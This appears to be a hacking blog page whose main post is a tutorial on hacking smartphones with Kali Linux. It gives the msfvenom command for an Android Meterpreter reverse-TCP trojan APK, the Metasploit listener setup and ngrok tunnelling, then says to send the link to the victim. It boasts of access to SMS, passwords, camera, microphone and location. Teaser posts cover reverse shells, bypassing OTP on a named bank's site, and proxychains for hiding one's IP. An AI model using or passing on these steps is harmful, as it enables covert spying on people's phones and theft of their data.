Reverse Shells

-
Image
>  A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. A reverse shell (also called a connect-back shell) can also be the only way to gain remote shell access across a NAT or firewall. Let’s see how reverse shells work in practice and what you can do to prevent them. How a Reverse Shell Works To establish a typical remote shell, a machine controlled by the attacker connects to a remote network host and requests a shell session – this is called a bind shell. But what if the remote host is not directly accessible, for example, because it has no public IP or is protected by a firewall? In this situation, a reverse shell might be used, where the target machine initiates an outgoing connection to a listening network host,
1 comment

MOBILE HACKING

-

Hack Smart Phone Using Kali(Remotely)



Earn free bitcoin
Hello Hackers,
This is my first post.
This is a tutorial explaining how to hack smart phones with kali.


STEP 1: OPEN KALI/PARROT:

# Open up your terminal and create a Trojan file (that can be named anything)
# It can be easily done by these commands:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST="ip" LPORT=4444 R> /root/Desktop/y2.apk

     

STEP 2: Open another terminal

# Open another terminal until the file is in process
# Load  metasploit console.

        $ service postgresql start
        $ msfconsole
It looks like:


 STEP 3: Set up listener

IT TAKES SOME TIME TO LOAD

# After it loads , now loads the multi-handler exploit, Now type:
  $ use multi/handler
Set up a reverse payload :
   $ set payload android/meterpreter/reverse_tcp
# Now set LHOST  :
   $ set lhost = "your ip address"
# Now set LPORT  :
   $ set lport = 4444
# Now exploit :
   $ exploit




NOW YOUR TROJAN IS READY , NOW YOU NEED TO PASS THIS FILE TO THE VICTIM'S PHONE:

STEP 4: PORT FORWARDING

# we use ngrok to create a secure tunnel.
  $ ./ngrok http 80


  • Now send the link to victim (on same network or over the network)


ADVANTAGE :

# Easily excess call details, sms, Passwords.
# Easily excess on camera,microphone.
# Easily can send messages to anyone over what's app,sms, Instagram or any social app.
# Easily excess over photos, Videos and Data .
# Can delete or add Data on Victim's phone .
# Current Location.



























Comments

Post a Comment

Popular posts from this blog

OTP Bypassing

-
Image
How I bypassed the OTP ? It's been a long since i posted blog, So in this blog i'll show you how i bypassed the OTP. This is only for the educational purpose. There are different ways by which we can try and bypass the login credentials with the help of different methods. Today , i am going to tell you how you can bypass OTP using burpsuite. Let's Start : Firstly, target any site or we can say select any site for the attack . I selected ICICI bank website.     Burp Suite on! So First step :   First you need to configure your browser with the burpsuite and secondly, you need to configure your browser to use the Burp Proxy listener as its HTTP proxy server. To do this, you need to change your browser's proxy settings to use the proxy host address (by default, 127.0.0.1) and port (by default, 8080) for both HTTP and HTTPS protocols, with no exceptions.   NOTE : If the listener is still not running, then Burp was not able to open the default proxy listener port (8080). S
Read more

Installing I2P Service

-
Image
 The I2P service is pretty simple to install, simply use the apt repository Gather the binaries $ sudo apt-add-repository ppa:i2p-maintainers/i2p $ sudo apt-get update $ sudo apt-get install i2p Once installed we can ensure it is running… system status i2p.service Basic config tweaks Assuming that worked, the first thing we will want to do is to familiarize ourselves with the router config. The preferred way to do this is through the router console served on the localhost. Since our VM is tiny and we have not installed a desktop thus far, we will do this through lynx (or dillo or Seamonkey) # Pick the browser you want... # browser="seamonkey" # browser="dillo" browser="lynx -cookies" http_proxy="http://127.0.0.1:4444" \  no_proxy="127.0.0.1" \  $browser \  http://127.0.0.1:7657 The first thing I did was to lower the bandwidth by a factor of 3. Since GCE charges for egress (bytes in), you will want to keep track of this and not go overbo
Read more

Setup Proxychains in Linux

-
Image
What is Proxychains? Proxychains is a tool that forces any TCP connection made by any given application to go through proxies like TOR or any other SOCKS4, SOCKS5 or HTTP proxies. It is an open-source project for GNU/Linux systems. Essentially, you can use ProxyChains to run any program through a proxy server. This will allow you to access the Internet from behind a restrictive firewall, hide your IP address, run applications like SSH/ telnet/wget/FTP and Nmap through proxy servers, and even access your local Intranet from outside through an external proxy. Proxychains even allows you to use multiple proxies at once by “chaining” the proxies together and to use programs with no built-in proxy support through a proxy. Setup Proxy in linux: Fire up your Linux Terminal write the commands $ sudo apt-get install tor It will install the tor service in your kali machine. After that you need to open the proxychain.conf file to edit it. $nano /etc/proxychains.conf it will open the file in the e
Read more